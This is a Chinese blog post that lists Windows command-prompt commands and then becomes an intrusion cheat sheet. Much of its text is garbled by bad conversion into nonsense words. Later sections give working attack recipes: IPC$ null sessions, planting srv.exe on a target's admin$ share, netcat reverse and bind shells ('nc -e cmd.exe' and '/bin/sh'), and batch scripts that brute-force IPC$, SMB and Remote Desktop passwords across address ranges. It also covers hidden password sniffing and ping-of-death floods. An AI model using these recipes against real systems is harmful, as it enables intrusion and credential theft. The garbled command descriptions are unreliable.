命令提示符

By admin in 操作系统 on 2019年11月12日

CMD命令

cmd是command的缩写.即命令提醒符(CMD卡塔尔国,是在OS
/ 2 , Windows CE与Windows NT平台为底子的操作系统(包罗Windows
二〇〇二和XP中, Vista中,和Server 2000 卡塔尔下的“MS-DOS 方式”。汉语版Windows
XP 中的命令提醒符进一层提升了与DOS
下操作命令的宽容性,客户可以在命令提示符直接输入闽南语调用文件。

指令作用

在9x种类下输入command就足以打开命令行.而在NT系统上能够输入cmd来开垦,在windows二〇〇四后被cmd代替,利用CMD命令查询系统的新闻仍为决断网络的好坏。

 

运作操作

CMD命令:开始->运行->键入cmd或command(在指令行里可以观察系统版本、文件系统版本卡塔 尔(英语:State of Qatar)

 

一声令下大全

编辑

  1. calc———–运营总计器

2.certmgr.msc—-证书管理实用程序

3.charmap——–启动字符映射表

  1. chkdsk.exe—–Chkdsk磁盘检查

  2. ciadv.msc——索引服务程序

  3. cleanmgr——-垃圾收拾

  4. cliconfg——-SQL SE帕杰罗VE昂科雷 客商端互联网实用程序

  5. Clipbrd——–剪贴板查看器

10. cmd.exe——–CMD命令提示符

11.
compmgmt.msc—微计算机管理

  1. conf———–启动netmeeting

13.
dcomcnfg——-打开系统组件服务

  1. ddeshare——-张开DDE分享设置

15.
devmgmt.msc— 设施微型机

16.
dfrg.msc——-磁盘碎片收拾程序

17.
diskmgmt.msc—磁盘管理实用程序

  1. drwtsn32—— 系统医务职员

  2. dvdplay——–DVD播放器

  3. dxdiag———检查DirectX信息

21.
explorer——-打开财富微型机

  1. eudcedit——-造字程序

23.
eventvwr——-事件查看器

24.
fsmgmt.msc—–分享文件夹管理器

25.
gpedit.msc—–组策略

  1. iexpress——-木马捆绑工具,系统自带

  2. logoff———注销命令

  3. lusrmgr.msc—-本机顾客和组

  4. notepad——–展开记事本

  5. magnify——–聚光镜实用程序

31.
mem.exe——–呈现内部存款和储蓄器行使状态

  1. mmc————张开调节台49.

  2. mobsync——–同步命令

34.mplayer2——-简易widnows media player

  1. Msconfig.exe—系统布局实用程序

36.
mspaint——–画图板

37.
mstsc———-远程桌面连接

38.
narrator——-屏幕“讲述人”

  1. net start
    messenger—-开始投递员服务

  2. netstat -an—-(TC)命令检查接口

  3. net stop messenger—–结束信使服务

  4. Nslookup——-IP地址侦测器 ,是二个监测网络中 DNS
    服务器是不是能准确落到实处域名分析的下令行工具.

它在Windows NT/二零零零/XP中均可接纳,但在 Windows 9第88中学却绝非并轨那二个工具。

  1. ntbackup——-系统备份和回复

  2. ntmsmgr.msc—-移动存款和储蓄微电脑

  3. ntmsoprq.msc—移动存款和储蓄助理馆员操作央浼

  4. odbcad32——-ODBC数据源微型机

  5. oobe/msoobe /a—-检查XP是或不是激活

48.
osk————打开显示器键盘

  1. packager——-对象包装程序

  2. perfmon.msc—-Computer品质监测程序

  3. progman——–程序微处理机

  4. regedit.exe—-注册表

53.
regedt32——-注册表编辑器

  1. regsvr32 /u *.dll—-结束dll文件运营

  2. regsvr32 /u zipfldr.dll——取消ZIP支持

56. rononce -p—-15秒关机

57.
rsop.msc——-组策略结果集

  1. secpol.msc—–本地安全攻略

  2. services.msc—本地服务设置

  3. sfc.exe——–系统文件检查器

61 sfc /scannow—–扫描错误并回复

  1. sfc /scannow—windows文件珍爱

63.
shrpubw——–创建分享文件夹

  1. shutdown——-60秒倒计时关机命令

65.
sigverif——-文本具名表达程序

  1. sndrec32——-录音机

  2. Sndvol32——-音量调整造进度序

  3. syncapp——–创制二个手袋

69.
sysedit——–种类安顿编辑器

  1. syskey———系统加密,生机勃勃旦加密就不能够解开,敬爱windows
    xp系统的重复密码

  2. taskmgr——–职责微处理器

  3. tourstart——xp简单介绍(安装到位后现身的出境游xp程序卡塔尔

  4. utilman——–协助理工科程师具微机

  5. wiaacmgr——-扫描仪和双反相机向导

  6. winchat——–XP自带局域网闲谈

76.
winmsd———系统音讯

  1. winver———检查Windows版本

  2. write———-写字板

  3. wmimgmt.msc—-张开windows管理种类结构(WMI)

  4. wscript——–windows脚本宿主设置

  5. wupdmgr——–windows更新程序

操作详细解释

编辑

net use ipipc$ ” ” /user:” ”
建立IPC空链接

net use ipipc$ “密码” /user:”顾客名” 创设IPC非空链接

net use h: ipc$ “密码” /user:”顾客名” 直接登录后映射对方C:到本地为H:

net use h: ipc$ 登录后映射对方C:到地头为H:

net use ipipc$ /del 删除IPC链接

net use h: /del 删除映射对方到当地的为H:的投射

net user 客商名 密码 /add 营造客户

net user guest /active:yes 激活guest用户

net user 查看有如何用户

net
user 帐户名 查看帐户的属性

net localgroup administrators 客户名 /add
把“客商”增添到管理员中使其抱有管理员权限

net start 查看开启了怎么服务

net start 服务名 开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time 目的ip 查看对方时间

net time 目的ip /set
设置本地计算机时间与“目的IP”主机的光阴同盟,加上参数/yes可收回确认音讯

net view 查看本地局域网内开启了哪些共享

net view ip 查看对方局域网内开启了怎么分享

net config 展现系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip “文本消息” 向对方发新闻

net ver 局域网内正在选择的互连网连接类型和音信

net share 查看本地开启的分享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest客户登录后用将密码改为12345

net password 密码 纠正系统登入密码

netstat -a 查看开启了何等端口,常用netstat -an

netstat -n 查看端口的互联网连接意况,常用netstat -an

netstat -v 查看正在打开的办事

netstat -p 合同名 例:netstat -p tcq/ip 查看某协商使用意况

netstat -s 查看正在选择的具备公约利用意况

nbtstat -A ip
对方136到第139中学间二个端口开了的话,就可查看对方这两日登入的客户名

tracert -参数
ip(或计算机名卡塔尔 追踪路由(数据包卡塔尔国,参数:“-w数字”用于安装超时间距。

ping ip(或域名)
向对方主机出殡暗中认可大小为32字节的数目,参数:“-l[空格]数码包大小”;“-n发送数据次数”;“-t”指直接ping。

ping -t -l 65500 ip
长逝之ping(发送超越64K的文本并间接ping就成了归西之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95
98卡塔 尔(英语:State of Qatar)查看当地ip地址,ipconfig可用参数“/all”呈现整个安插消息

tlist -t
以树行列表突显进度(为系统的增大工具,默许是未有安装的,在设置目录的Support/tools文件夹内卡塔尔

kill -F 进程名
加-F参数后强制甘休某进度(为系统的附加工具,默许是未曾设置的,在装置目录的Support/tools文件夹内卡塔尔

del -F 文件名
加-F参数后就可去除只读文件,/A凯雷德、/AH、/AS、/AA分别代表删除只读、掩瞒、系统、存档文件,/A-Sportage、/A-H、/A-S、/A-A表示删除除只读、掩没、系统、存档以外的文本。比方“DEL/APAJERO
*.*”表示删除当前目录下全部只读文件,“DEL/A-S
*.*”表示删除当前目录下除系统文件以外的享有文件

del /S /Q 目录 或用:rmdir /s /Q 目录
/S删除目录及目录下的全数子目录和文书。同时利用参数/Q
可撤销删除操作时的系统确认就径直删除。(三个指令功效相近卡塔尔国

move 盘符路线要活动的文件名 贮存移动文件的门路移动后文件名
移动文件,用参数/y将收回确认移动目录存在近似文件的唤醒就直接覆盖

fc one.txt two.txt > 3st.txt
比较贰个文本并把区别之处输出到3st.txt文本中,”> “和”> >”
是重定向命令

at id号 开启已注册的某部铺排义务

at /delete 甘休全部安顿职责,用参数/yes则无需明确就径直停止

at id号 /delete 截止某些已登记的布署职分

at 查看全部的陈设职分

at ip time 程序名(或二个命令卡塔 尔(阿拉伯语:قطر‎ /r
在某时间运作对方某前后相继并再一次起动计算机

finger username @host 查看近年来有如何客商登录

telnet ip 端口 远程登录服务器,暗中认可端口为23

open ip 连接到IP(属telnet登录后的命令卡塔尔

telnet 在本机上直接键入telnet 将步入本机的telnet

copy 路线文件名1 路径文件名2 /y
复制文件1到钦命的目录为文件2,用参数/y就同期撤销确认你要改写后生可畏份现有目录文件

copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下

copy 1st.jpg/b+2st.txt/a 3st.jpg
将2st.txt的开始和结果藏身到1st.jpg中生成3st.jpg新的文本,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

copy ipadmin$svv.exe c: 或:copyipadmin$*.*
复制对方admini$分享下的srv.exe文件(全部文件卡塔 尔(英语:State of Qatar)至本土C:

xcopy 要复制的公文或目录树 目的地址目录名
复制文件和目录树,用参数/Y将不提示覆盖雷同文件

用参数/e才可连目录下的子目录一同复制到指标地址下。

tftp -i 自个儿IP(用肉机作跳板时那用肉机IP)
get server.exec:server.exe
登入后,将“IP”的server.exe下载到目的主机c:server.exe
参数:-i指以二进制格局传送,如传送exe文件时用,如不加-i
则以ASCII形式(传送文件文件情势卡塔尔国实行传递

tftp -i 对方IP put c:server.exe
登录后,上传本地c:server.exe至主机

ftp ip 端口
用于上传文件至服务器或举办文件操作,暗许端口为21。bin指用二进制方式传送(可实践文件进卡塔尔国;默以为ASCII格式传送(文本文件时卡塔 尔(阿拉伯语:قطر‎

route print
显示出IP路由,将根本展现互连网地址Network
addres,子网掩码Netmask,网关地点Gateway
addres,接口地址Interface

arp
查看和管理ARP缓存,ARP是名字剖判的情致,担当把一个IP分析成二个物理性的MAC地址。arp
-a将显得出全部新闻

start 程序名或指令 /max 或/min
新开一个新窗口并最大化(最小化卡塔 尔(英语:State of Qatar)运转某前后相继或指令

mem 查看cpu使用意况

attrib 文件名(目录名卡塔 尔(英语:State of Qatar) 查看某文件(目录卡塔 尔(英语:State of Qatar)的性质

attrib 文件名 -A -汉兰达 -S -H 或 +A +揽胜极光 +S +H 去掉(增添卡塔 尔(阿拉伯语:قطر‎某文件的
存档,只读,系统,掩盖 属性;用+则是丰裕为某属性

dir
查看文件,参数:/Q展现文件及目录属系统哪个用户,/T:C呈现文件制造时间,/T:A展现文件上次被访问时间,/T:W上次被改革时间

date /t 、 time /t
使用此参数即“DATE/T”、“TIME/T”将只显示当前些天子和岁月,而不必输入新日期和时间

set
指定处境变量名称=要指使给变量的字符
设置际遇变量

set 呈现当前持有的遇到变量

set p(或其它字符卡塔 尔(英语:State of Qatar)展现出近来以字符p(或其余字符卡塔尔初叶的享有遭受变量

pause
暂停批处理次第,并展现出:请按任意键继续….

if
在批管理程序中施行尺度管理(越多表明见if命令及变量卡塔 尔(英语:State of Qatar)

goto 标签
将cmd.exe导向到批处理程序中带标签的行(标签必得独立意气风发行,且以冒号打头,举例:“:start”标签卡塔尔

call 路径批管理公事名 从批处理程序中调用另二个批处理程序
(越来越多表明见call /?卡塔 尔(阿拉伯语:قطر‎

for 对意气风发组文件中的每叁个文件推行有些特定命令(更多说明见for命令及变量卡塔尔国

echo on或off 展开或关闭echo,仅用echo不加参数则体现当前echo设置

echo 音信 在显示屏上彰显出音讯

echo 信息 >> pass.txt 将”信息”保存到pass.txt文件中

findstr “Hello” aa.txt 在aa.txt文件中探求字符串hello

find 文件名 查找某文件

title 题目名字 改过CMD窗口标题名字

color 颜色值
设置cmd调控台前程和背景颜色;0=黑、1=蓝、2=绿、3=烟灰、4=红、5=紫、6=黄、7=白、8=灰、9=葱白、A=海蓝、B=石榴红褐、C=卡其灰、D=粉红、E=深藕红、F=亮白

prompt 名称
更改cmd.exe的来得的命令提示符(把C:、D:统一改为:EntSky
)

ver 在DOS窗口下显得版本新闻

winver
弹出二个窗口体现版本消息(内部存储器大小、系统版本、补丁版本、Computer名卡塔 尔(阿拉伯语:قطر‎

format 盘符 /FS:类型
格式化磁盘,类型:FAT、FAT32、NTFS,例:Format D: /FS:NTFS

md 目录名 创造目录

replace 源文件 要替换文件的目录
替换文件

ren 最先的著作件名 新文件名 重命名文件名

tree
以树形结构彰显出目录,用参数-f
将列出第个文件夹汉语件名称

type 文件名 突显文本文件的内容

more 文件名 逐屏展现输出文件

doskey
要锁定的命令=字符

doskey 要解锁命令=
为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创立宏卡塔 尔(阿拉伯语:قطر‎。如:锁定dir命令:doskey
dir=entsky (无法用doskey dir=dir卡塔 尔(阿拉伯语:قطر‎;解锁:doskey dir=

taskmgr 调出任务微电脑

chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的大谬不然

tlntadmn
telnt服务admn,键入tlntadmn选取3,再选用8,就能够修改telnet服务暗许端口23为任何任何端口

exit
退出cmd.exe前后相继或近日,用参数/B则是脱离当前批处理剧本并不是cmd.exe

path
路径可实行文件的公文名叫可施行文件设置多个路子。

cmd 运营四个win2K命令解释窗口。参数:/eff、/en
关闭、开启命令扩大;更小编详细表达见cmd /?

regedit /s 注册表文件名 导入注册表;参数/S指安静情势导入,无其余提醒;

regedit /e 注册表文件名 导出注册表

cacls 文件名 参数展现或涂改文件访谈调整列表(ACL卡塔 尔(阿拉伯语:قطر‎——针对NTFS格式时。参数:/D
客商名:设定谢绝某客商访谈;/P 客商名:perm 替换钦点客商的拜会权限;/G
客户名:perm 付与内定客商访问权限;Perm 能够是: N 无,凯雷德 读取, W 写入,
C 修改(写入卡塔尔,F 完全调控;例:cacls D: est.txt /D pub 设定d:
est.txt拒绝pub顾客访谈。

cacls 文件名 查看文件的探访顾客权限列表

REM 文本内容
在批处理文件中增多表明

netsh 查看或更改本地网络配置情状

IIS服务命令

iisreset /reboot 重启win2kComputer(但有提醒系统将重启新闻现身卡塔尔

iisreset /start或stop
启动(停止)所有Internet服务

iisreset /restart 结束然后再次起动全体Internet服务

iisreset /status 展现全体Internet服务景况

iisreset /enable或disable 在本土系统上启用(禁止使用卡塔 尔(阿拉伯语:قطر‎Internet服务的重复起动

iisreset /rebootonerror
当运行、甘休或另行起动Internet服务时,若产生错误将重新开机

iisreset /noforce 若无法甘休Internet服务,将不会强制结束Internet服务

iisreset /timeout
Val在达到逾时间(秒卡塔 尔(英语:State of Qatar)时,仍未停止Internet服务,若钦赐/rebootonerror参数,则计算机将会再一次开机。预设值为再次开动20秒,结束60秒,重新开机0秒。

FTP 命令:(前面有详尽表明内容卡塔 尔(阿拉伯语:قطر‎

ftp的指令行格式为:

ftp -v -d -i -n
-g[主机名] -v
呈现远程服务器的具备响应新闻。

-d 使用调节和测验方式。

-n 约束ftp的自动登陆,即不使用.netrc文件。

-g 撤除全局文件名。

help [命令] 或 ?[命令] 查看命令表明

bye 或 quit 终止主机FTP进度,并脱离FTP管理形式.

pwd 列出这几天远端主机目录

put 或 send 当和姑件名 [上传到主机上的公文名]
将本地三个文书传送至远端主机中

get 或 recv [长途主机文件名] [下载到地面后的文本名]
从远端主机中传递至本地主机中

mget [remote-files] 从远端主机接纳一堆文件至本地主机

mput local-files 将地面主机中一堆文件传送至远端主机

dir 或 ls [remote-directory] [local-file]
列出当下远端主机目录中的文件.若是有当羊眼半夏件,就将结果写至当守田件

ascii
设定以ASCII方式传递文件(缺省值)

bin 或 image 设定以二进制形式传送文件

bell 每成功叁回文件传送,报告急察方提醒

cdup 再次来到上超级目录

close 中断与长途服务器的ftp会话(与open对应卡塔尔

open host[port] 构建钦点ftp服务器连接,可钦命连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一堆文件

mkdir directory-name 在远端主机中创设目录

rename [from] [to] 更正远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的情况

system
展现远端长机系统类型

user user-name [password] [account] 重新以别的客商名登陆远端主机

open host [port] 重新建设构造一个新的一连

prompt 交互作用提示格局

macdef 定义宏命令

lcd
退换如今本地主机的劳作目录,要是缺省,就转到当前客户的HOME目录

chmod 改造远端主机的文本权限

case
当为ON时,用MGET命令拷贝的文书名到本土机械中,全体转换为小写字母

cd remote-dir 步向远程主机目录

cdup 进入远程主机目录的父目录

! 在本土机中履行交互作用shell,exit回到ftp景况,如!ls*.zip

#5

MYSQL 命令

mysql
-h长机地址 -u客商名
-p密码 连接MYSQL;假设刚安装好MYSQL,拔尖顾客root是一向不密码的。

(例:mysql -h110.110.110.110 -Uroot -P123456

注:u与root能够不用加空格,别的也同等卡塔 尔(阿拉伯语:قطر‎

exit 退出MYSQL

mysqladmin -u客户名 -p旧密码 password 新密码 修改密码

grant select on 数据库.* to 顾客名@登陆主机 identified by “密码”;
扩展新顾客。(注意:和上边不相同,下边的因为是MYSQL情形中的命令,所以前边都带二个分店作为命令甘休符卡塔尔

show databases;
展现数据库列表。刚开头时才三个数据库:mysql和test。mysql库很要紧它里面有MYSQL的连串音讯,咱们改密码和新添客商,实际上纵然用那些库开展操作。

use mysql;

show tables; 呈现库中的数据表

describe 表名; 展现数据表的组织

create database 库名; 建库

use 库名;

create table 表名 (字段设定列表卡塔 尔(英语:State of Qatar); 建表

drop database 库名;

drop table 表名; 删库和删表

delete from 表名; 将表中著录清空

select * from 表名; 呈现表中的记录

mysqldump –opt school>school.bbb 备份数据库:(命令在DOS的mysql
in目录下实行卡塔 尔(英语:State of Qatar);注释:将数据库school备份到school.bbb文件,school.bbb是二个文件文件,文件名任取,张开看看您会有新意识。

win二零零一系统下新添命令(实用部份卡塔 尔(英语:State of Qatar):

shutdown /参数
关闭或重启本地或远程主机。

参数表明:/S 关闭主机,/R 重启主机, /T 数字
设定延时的年月,范围0~180秒之内, /A撤消开机,/M //IP 钦命的长途主机。

例:shutdown /r /t 0
立即重启本土主机(无延时)

taskkill /参数 进度名或进度的pid 终止叁个或多少个职分和过程。

参数表明:/PID 要停下进度的pid,可用tasklist命令获得各进度的pid,/IM
要适度可止的经过的经过名,/F 强制截止进度,/T
终止钦定的长河及她所运行的子过程。

tasklist
展现当前运维在本地和长间隔主机上的长河、服务、服务各进程的进度标识符(PID)。

参数说明:/M 列出当前经过加载的dll文件,/SVC
显示出种种进程对应的劳动,无参数时就只列出当下的进程。

Linux系统下大旨命令 注:要分别朗朗上口写

uname 显示版本消息(同win2K的 ver卡塔尔

dir 展现当前目录文件,ls -al 展现富含隐形文件(同win2K的 dir卡塔尔国

pwd 查询当前所在的目录地方

cd cd ..回到上风姿洒脱层目录,注意cd 与..之间有空格。cd /再次来到到根目录。

cat 文件名 查看文件内容

cat >abc.txt 往abc.txt文件中写上内容。

more 文件名 以风流倜傥页风流倜傥页的法子呈现一个文本文件。

cp 复制文件

mv 移动文件

rm 文件名 删除文件,rm -a 目录名删除目录及子目录

mkdir 目录名 构建目录

rmdir 删除子目录,目录内并未有文书档案。

chmod 设定档案或目录的存取权限

grep 在档案中寻觅字符串

diff 档案文件相比较

find 档案搜寻

date 以后的日子、时间

who 查询近年来和你使用相通台机械的人以致Login时间地点

w 查询近些日子上机者的详细资料

whoami 查看本人的帐号名称

groups 查看某个人的Group

passwd 校订密码

history 查看本身下过的通令

ps 展现进程情状

kill 甘休某进度

gcc 黑客平常用它来编译C语言写的文书

su 权限调换为钦点使用者

telnet IP
telnet连接对方主机(同win2K卡塔 尔(英语:State of Qatar),当现身bash$时就认证连接成功。

ftp ftp连接上某服务器(同win2K卡塔尔国

批处理指令与变量

1:for命令及变量 基本格式

FOR /参数 %variable IN (set)
DO command [command_parameters]
%variable:钦点叁个单纯字母可替换的参数,如:%i
,而钦命叁个变量则用:%%i ,而调用变量时用:%i% ,变量是分别轻重缓急写的(%i
不对等 %I卡塔尔国。

批管理每一回能管理的变量从%0—%9共12个,个中%0暗中同意给批管理文件名使用,%1默认为选拔此批管理时输入的的首先个值,同理:%2—%9指输入的第2-9个值;例:net
use ipipc$ pass /user:user 中ip为%1,pass为%2,user为%3

(set卡塔 尔(英语:State of Qatar):钦命三个或一组文件,可使用通配符,如:(D:user.txt卡塔尔国和(1 1
254)(1 -1 254),{ “(1 1
254卡塔尔国”第三个”1″指发轫值,第一个”1″指增加量,第两个”254″指终结值,即:从1到254;“(1
-1 254卡塔 尔(英语:State of Qatar)”表达:即从254到1 }

command:内定对第个文件举行的指令,如:net
use命令;如要试行多少个指令时,命令那间加:& 来隔断

command_parameters:为特定命令钦定参数或命令行按钮

IN (set):指在(set)中取值;DO command :指执行command

参数:/L 指用增量格局{ (set卡塔 尔(阿拉伯语:قطر‎为增量方式时 };/F
指从文件中频频取值,直到取完截至{ (set卡塔尔为文件时,如(d:pass.txt卡塔尔时 }。

用法比方:

@echo off

echo 用法格式:test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use
%1.%%G /user:administrator | find “命令成功完毕” >>test.txt

存为test.bat
表达:对点名的二个C类网段的2伍拾伍个IP依次试创建administrator密码为空的IPC$连接,如若成功就把该IP存在test.txt中。

/L指用增量格局(即从1-254或254-1卡塔 尔(英语:State of Qatar);输入的IP前边几人:*.*.*为批处理默许的
%1;%%G 为变量(ip的最后一个人卡塔尔;& 用来隔断echo 和net use 那贰个指令;|
指创建了ipc$后,在结果中用find查看是还是不是有”命令成功完结”音信;%1.%%G
为总体的IP地址;(1 1 254) 指初阶值,增进量,结止值。

@echo off

echo 用法格式:ok.bat ip

FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200

存为:ok.exe
表明:输入叁个IP后,用字典文件d:pass.dic来暴解d:user.dic中的客户密码,直到文件中值取完截至。%%i为客户名;%1为输入的IP地址(默许卡塔 尔(英语:State of Qatar)。

七:

2:if命令及变量 基本格式

IF [not] errorlevel 数字 命令语句
纵然程序运行最终回到多少个也便是或高于内定数字的淡出编码,钦点条件为“真”。

例:IF errorlevel 0 命令 指程序履行后赶回的值为0时,就值行后面包车型大巴下令;IF
not errorlevel 1 命令指程序实践最后回到的值不对等1,就举办前边的指令。

0 指发掘并成功实施(真卡塔 尔(英语:State of Qatar);1 指没有察觉、没实践(假卡塔尔。

IF [not] 字符串1==字符串2 限令语句
如若钦点的文书字符串相配(即:字符串1
极其 字符串2卡塔 尔(英语:State of Qatar),就实施前面包车型地铁通令。

例:“if “%2%”==”4″ goto
start”指:若是输入的第一个变量为4时,推行后面的授命(注意:调用变量时就%变量名%并加”
“卡塔尔

IF [not] exist 文件名 命令语句
就算钦命的文本名存在,就实行前面包车型大巴一声令下。

例:“if not nc.exe goto
end”指:若无察觉nc.exe文件就跳到”:end”标签处。

IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not]
字符串1==字符串2 下令语句 else 命令语句或 IF [not] exist 文件名
命令语句 else 命令语句 加上:else
命令语句后指:当前边的尺度不树登时,就指行else前面包车型地铁授命。注意:else
必需与 if 在同黄金年代行才使得。当有del命令时需把del命令全体内容用<
>括起来,因为del命令要单唯风流倜傥行时手艺实行,用上<
>后就极度是独立生龙活虎行了;举个例子:“if exist test.txt. <del
test.txt.> else echo test.txt.missing ”,注意命令中的“.”

系统外界命令

注:系统外部命令(均需下载相关工具卡塔尔

Switzerland军刀:nc.exe

参数表达:

-h 查看扶植音讯

-d 后台格局

-e prog程序重定向,大器晚成但老是就实行[危险]

-i secs延时的间隔

-l 监听形式,用于入站连接

-L 监听格局,连接天闭后依然三回九转监听,直到CT安德拉+C

-n IP地址,不能够用域名

-o film记录16进制的传导

-p[空格]端口
本地端口号

-r 随机本地及远程端口

-t 使用Telnet人机联作情势

-u UDP模式

-v 详细输出,用-vv将更详尽

-w数字 timeout延时间距

-z 将输入,输出关掉(用于扫锚时卡塔 尔(阿拉伯语:قطر‎

核心用法:

nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

nc -l -p 80 开启本机的TCP 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e
c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP
5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354
梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口

高级用法:

nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CT君越+C停止

nc -L -p 80 > c:log.txt
作为蜜罐用2:开启并不停地监听80端口,直到CT哈弗+C,同有的时候间把结果输出到c:log.txt

nc -L -p 80 < c:honeyport.txt
作为蜜罐用3-1:开启并不停地监听80端口,直到CT凯雷德+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件功能

type.exe c:honeyport | nc -L -p 80
作为蜜罐用3-2:开启并不停地监听80端口,直到CT路虎极光+C,并把c:honeyport.txt中剧情送入管道中,亦可起到传送文件功效

本机上用:nc -l -p 本机端口

在对方主机上用:nc
-e cmd.exe 本机IP -p 本机端口
*win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix
反向连接突破对方主机的防火墙

本机上用:nc -d -l -p 本机端口 < 要传递的公文路线及称谓

在对方主机上用:nc -vv 本机IP 本机端口 > 寄放文件的不二秘技及称谓
传送文件到对方主机

备 注:

| 管道命令

< 或 > 重定向命令。“<;”,比如:tlntadmn < test.txt
指把test.txt的剧情赋值给tlntadmn命令

@ 表示施行@后边的指令,但不博览会示出来(后台试行卡塔尔国;例:@dir c:winnt
>> d:log.txt 意思是:后台实行dir,并把结果存在d:log.txt中

>与>>的区别 “>”指:覆盖;”>>”指:保存到(添加到)。

如:@dir c:winnt >> d:log.txt和@dir c:winnt >
d:log.txt三个指令分别实践二回比较看:用>>的则是把一回的结果都保留了,而用:>则唯有壹遍的结果,是因为第一遍的结果把第一遍的掩没了。

八:

围观工具:xscan.exe

着力格式

xscan -host <;起始IP>[-<;终止IP>] <;检查测量检验项目>
[其它选项]
扫锚”开首IP到终止IP”段的享有主机信息

xscan -file <;主机列表文件名> <;检查实验项目> [别的选项]
扫锚”主机IP列表文件名”中的全数主机音讯

检查测量试验连串

-active 检测主机是还是不是存活

-os
检查评定远程操作系统类型(通过NETBIOS和SNMP协议)

-port 检查测量检验常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检验FTP服务佚名客户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检查实验IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检查评定以上全体品类

此外选项

-i 适配器编号 设置网络适配器,<;适配器编号>可透过”-l”参数获取

-l
突显全体互连网适配器

-v 显示详细扫描进程

-p 跳过未有响应的主机

-o 跳过未有检查测量检验到开放端口的主机

-t 并发线程数量,并发主机数量
钦定最大并发线程数量和产出主机数量,暗中认可数量为100,10

-log 文件名 内定扫描报告文本名 (后缀为:TXT或HTML格式的文本卡塔 尔(英语:State of Qatar)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active
-p 检验192.168.1.1-192.168.255.255网段内主机的兼具漏洞,跳过无响应的主机

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o
检查评定192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令客户,最大并发线程数量为150,跳过未有检验到开放端口的主机

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o
检查评定“hostlist.txt”文件中列出的保有主机的正经端口状态,CGI漏洞,最大并发线程数量为200,同不常刻最多检验5台主机,显示详细检查评定进程,跳过没有检查测验到开放端口的主机

九:

命令增势势嗅探器:
xsniff.exe

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数表明

-tcp 输出TCP数据报

-udp 输出UDP数据报

-icmp 输出ICMP数据报

-pass 过滤密码新闻

-hide 后台运转

-host
解析主机名

-addr IP地址 过滤IP地址

-port 端口 过滤端口

-log 文件名 将出口保存到文件

-asc 以ASCII格局出口

-hex 以16进制方式出口

用法示例

xsniff.exe -pass -hide -log pass.log
后台运维嗅探密码并将密码新闻保存在pass.log文件中

xsniff.exe -tcp -udp -asc -addr 192.168.1.1
嗅探192.168.1.1并过滤tcp和udp新闻并以ASCII格式输出

终点服务密码破解: tscrack.exe

参数表达

-h 突显应用援助

-v 展现版本信息

-s 在显示屏上打出解密才具

-b 密码错误时发生的响动

-t 同是发出多个再三再四(八线程卡塔 尔(阿拉伯语:قطر‎

-N Prevent System Log entries on targeted server

-U 卸载移除tscrack组件

-f 使用-f前边的密码

-F 间距时间(频率卡塔 尔(阿拉伯语:قطر‎

-l 使用-l前面包车型地铁顾客名

-w 使用-w后边的密码字典

-p 使用-p前边的密码

-D 登入主页面

用法示例

tscrack 192.168.0.1 -l administrator -w pass.dic
远程用密码字典文件暴破主机的administrator的登入密码

tscrack 192.168.0.1 -l administrator -p 123456
用密码123456远程登入192.168.0.1的administrator用户

@if not exist ipcscan.txt goto noscan

@for /f “tokens=1 delims= ” %%i in (3389.txt) do call hack.bat %%i

nscan

@echo 3389.txt no find or scan faild

(①存为3389.bat)
(若是现存用SuperScan或其余扫锚器扫到一堆开有3389的主机IP列表文件3389.txt)

3389.bat意思是:从3389.txt文件中取二个IP,接着运维hack.bat

@if not exist tscrack.exe goto noscan

@tscrack %1 -l administrator -w pass.dic >>rouji.txt

:noscan

@echo tscrack.exe no find or scan faild

(②存为hack.bat)
(运营3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同八个索引下;就能够等待结果了卡塔 尔(阿拉伯语:قطر‎

hack.bat意思是:运营tscrack.exe用字典暴破3389.txt中具备主机的administrator密码,并将破解结果保存在rouji.txt文件中。

其它

Shutdown.exe

Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows
二零零二系统自带工具,在Windows二零零三下用进就得下载此工具才具用。在前边Windows
2002 DOS命令中有详细介绍。卡塔尔国

fpipe.exe (TCP端口重定向工具卡塔 尔(阿拉伯语:قطر‎在第二篇中有详尽表明(端口重定向绕过防火墙)

fpipe -l 80 -s 1029 -r 80
当有人扫锚你的80端口时,他扫到的结果会完全都以的主机音信

Fpipe -l 23 -s 88 -r 23 目的IP
把本机向指标IP发送的23端口Telnet央求经端口重定向后,就经过88端口发送到目的IP的23端口。(与对象IP建设构造Telnet时本机就用的88端口与其相连接卡塔尔然后:直接Telnet 127.0.0.1(本机IP卡塔尔国就连选择指标IP的23端口了。

OpenTelnet.exe (远程开启telnet工具卡塔尔

opentelnet.exe
